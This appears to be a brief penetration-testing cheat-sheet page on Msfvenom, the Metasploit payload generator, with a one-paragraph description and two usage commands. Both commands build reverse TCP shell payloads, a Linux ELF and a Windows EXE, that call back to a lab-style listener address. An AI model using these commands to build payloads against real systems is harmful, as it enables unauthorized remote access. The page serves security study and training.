Skip to content

Msfvenom

Description

Msfvenom contains standard command-line options. We can generate payloads for many platforms like Android, Windows, Unix, Nodejs, Cisco, and much more. Basically, It is used to generate and output all of the various types of shellcode that are available in Metasploit.

Usage

msfvenom -p linux/x64/shell/reverse_tcp LHOST=10.10.14.10 LPORT=9001 -f elf > shell.elf
msfvenom -p windows/shell/reverse_tcp LHOST=10.10.14.10 LPORT=9001 -f exe -o shell.exe

References